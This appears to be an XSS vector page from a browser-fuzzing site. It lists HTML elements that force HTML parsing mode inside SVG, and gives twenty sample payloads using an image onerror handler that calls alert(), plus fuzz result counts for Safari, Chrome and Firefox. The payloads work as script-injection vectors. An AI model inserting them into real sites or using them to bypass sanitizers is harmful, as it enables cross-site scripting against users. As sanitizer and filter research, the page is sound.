HTML tags that force HTML mode inside SVG
39
39
1
This vector shows which HTML elements cause the browser to change to HTML mode.
Created by: hackvertor
Created on: Friday, August 2, 2024 at 11:24:48 AM
Updated on: Tuesday, December 17, 2024 at 9:46:44 PM
Vector type: XSS
Vector charset: UTF-8
Template used:
<svg><$[data1]><image src=data: onerror=log('$[data1]')></$[data1]></svg>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<svg><u><image src=data: onerror=alert('u')></u></svg>
<svg><dt><image src=data: onerror=alert('dt')></dt></svg>
<svg><li><image src=data: onerror=alert('li')></li></svg>
<svg><blockquote><image src=data: onerror=alert('blockquote')></blockquote></svg>
<svg><img><image src=data: onerror=alert('img')></img></svg>
<svg><code><image src=data: onerror=alert('code')></code></svg>
<svg><table><image src=data: onerror=alert('table')></table></svg>
<svg><ul><image src=data: onerror=alert('ul')></ul></svg>
<svg><big><image src=data: onerror=alert('big')></big></svg>
<svg><s><image src=data: onerror=alert('s')></s></svg>
<svg><p><image src=data: onerror=alert('p')></p></svg>
<svg><strike><image src=data: onerror=alert('strike')></strike></svg>
<svg><center><image src=data: onerror=alert('center')></center></svg>
<svg><sup><image src=data: onerror=alert('sup')></sup></svg>
<svg><ol><image src=data: onerror=alert('ol')></ol></svg>
<svg><body><image src=data: onerror=alert('body')></body></svg>
<svg><em><image src=data: onerror=alert('em')></em></svg>
<svg><div><image src=data: onerror=alert('div')></div></svg>
<svg><br><image src=data: onerror=alert('br')></br></svg>
<svg><small><image src=data: onerror=alert('small')></small></svg>
Fuzz results
Safari 18.0 desktop macOS 10.15.7
Updated
Fri Aug 02 2024
Found 39 results
Loading...
Chrome 127.0.0.0 desktop macOS 10.15.7
Updated
Sat Aug 03 2024
Found 39 results
Loading...
Firefox 128.0 desktop macOS 10.15
Updated
Sat Aug 03 2024
Found 1 result
Loading...